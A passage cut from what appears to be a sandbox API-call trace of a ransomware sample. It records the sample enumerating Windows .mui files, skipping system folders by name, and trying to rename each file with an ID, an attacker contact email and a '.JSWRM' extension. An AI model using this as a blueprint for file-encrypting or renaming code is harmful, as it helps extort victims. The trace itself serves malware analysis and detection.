dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.840] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da3ec5f, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7bf3d600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0067.840] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2=".") returned 1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="..") returned 1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="...") returned 1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="windows") returned -1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="recovery") returned -1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="perflogs") returned -1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="documents and settings") returned 1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="system volume information") returned -1 [0067.841] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="msocache") returned -1 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe.mui", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe.mui", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe.mui", lpUsedDefaultChar=0x0) returned 27 [0067.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe.mui", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FlickLearningWizard.exe.mui", cchWideChar=27, lpMultiByteStr=0x241358, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlickLearningWizard.exe.mui", lpUsedDefaultChar=0x0) returned 27 [0067.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0067.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0067.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.841] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9963602574533920) returned 0 [0067.841] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.842] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.842] CloseHandle (hObject=0xffffffff) returned 1 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0067.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.842] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2=".") returned 1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="..") returned 1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="...") returned 1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="windows") returned -1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="recovery") returned -1 [0067.842] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="perflogs") returned -1 [0067.843] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="documents and settings") returned 1 [0067.843] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.843] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="system volume information") returned -1 [0067.843] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="msocache") returned -1 [0067.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InkObj.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.844] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.844] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.844] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.844] CloseHandle (hObject=0xffffffff) returned 1 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0067.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0067.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.844] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.845] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2=".") returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="..") returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="...") returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="windows") returned -1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="recovery") returned -1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="perflogs") returned -1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="documents and settings") returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="system volume information") returned -1 [0067.845] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="msocache") returned -1 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe.mui", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe.mui", cchWideChar=28, lpMultiByteStr=0x241218, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe.mui", lpUsedDefaultChar=0x0) returned 28 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe.mui", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe.mui", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe.mui", lpUsedDefaultChar=0x0) returned 28 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0067.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0067.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.846] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9953329012762440) returned 0 [0067.846] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.846] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.846] CloseHandle (hObject=0xffffffff) returned 1 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0067.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.846] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.846] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2=".") returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="..") returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="...") returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="windows") returned -1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="recovery") returned -1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="perflogs") returned -1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="documents and settings") returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="system volume information") returned -1 [0067.847] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="msocache") returned -1 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll.mui", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, 